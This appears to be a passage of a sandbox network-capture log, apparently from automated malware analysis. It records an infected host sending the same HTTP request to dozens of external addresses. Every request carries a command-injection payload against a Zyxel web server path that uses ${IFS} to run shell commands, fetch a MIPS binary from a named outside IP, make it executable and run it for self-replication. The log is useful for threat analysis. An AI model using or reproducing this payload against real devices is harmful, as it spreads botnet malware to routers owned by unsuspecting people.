                                                  Jan 19, 2024 18:23:49.940887928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3099192.168.2.134050652.77.82.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.940918922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3100192.168.2.134397431.16.84.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.940957069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3101192.168.2.1344372155.177.209.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.940988064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3102192.168.2.1334552109.72.51.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.941011906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3103192.168.2.134649073.33.208.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.941059113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3104192.168.2.135549235.146.240.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.941086054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3105192.168.2.134937675.120.19.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.941121101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3106192.168.2.1360836110.187.152.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.941155910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3107192.168.2.1342782155.41.175.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.941206932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3108192.168.2.1341444138.10.107.137443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.941262007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3109192.168.2.1336778220.242.39.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.941299915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3110192.168.2.1360450116.136.193.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.941349030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3111192.168.2.1342576129.114.150.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.941370010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3112192.168.2.13452889.123.203.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.941416025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3113192.168.2.1343290120.207.40.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.941436052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3114192.168.2.1352314203.13.104.102443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.941472054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3115192.168.2.1355712107.45.118.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.941520929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3116192.168.2.1333372162.58.201.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.941546917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3117192.168.2.134675444.10.175.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.941607952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3118192.168.2.1353330183.34.216.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.941651106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3119192.168.2.135296245.248.247.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.941678047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3120192.168.2.134512045.46.218.179443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.941720963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3121192.168.2.1339204146.42.193.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.941756010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3122192.168.2.1354464159.13.245.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.941776991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3123192.168.2.1340142158.16.75.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.941807985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3124192.168.2.1358354155.45.191.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.941881895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3125192.168.2.1350918107.78.182.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.941893101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3126192.168.2.135517045.77.188.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.941946030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3127192.168.2.1357578131.62.40.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.941971064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3128192.168.2.134625024.246.51.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.942018032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3129192.168.2.135688474.20.212.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.942053080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3130192.168.2.1358568154.207.115.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.942090988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3131192.168.2.1354104157.103.82.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.942121983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3132192.168.2.133292439.219.137.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:49.945367098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3133192.168.2.1358520119.61.45.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.954210043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3134192.168.2.133888634.225.29.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.954251051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3135192.168.2.1354462163.193.139.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.954317093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3136192.168.2.133794619.57.30.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.954361916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3137192.168.2.1341504191.233.173.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.954381943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3138192.168.2.1342656117.42.251.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.954422951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3139192.168.2.133701017.205.25.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.954466105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3140192.168.2.1346040162.183.233.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.954494953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3141192.168.2.135731843.20.74.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.954560041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3142192.168.2.1353864183.147.194.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.954607964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3143192.168.2.1341688180.9.96.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.954634905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3144192.168.2.135824464.101.84.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.954678059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3145192.168.2.1358308222.108.33.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.954725027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3146192.168.2.135710420.120.74.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.954766989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3147192.168.2.134625850.117.35.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.954804897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3148192.168.2.1338074128.79.142.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.954859972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3149192.168.2.134118865.170.245.4443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.954888105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3150192.168.2.1354972183.152.19.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.954937935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3151192.168.2.1339832113.61.240.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.954981089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3152192.168.2.134679092.234.189.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.955025911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3153192.168.2.1341844182.134.61.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.955044031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3154192.168.2.1344902137.29.10.120443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.955087900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3155192.168.2.133927461.180.55.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.955127954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3156192.168.2.134820842.228.216.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.955163002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3157192.168.2.1356584179.156.39.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.955183983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3158192.168.2.134015483.182.84.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.955219030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3159192.168.2.1355902207.182.104.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.955265045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3160192.168.2.1360262119.108.147.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.955310106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3161192.168.2.1346648223.98.164.182443
                                                  TimestampBytes transferredDirectionData
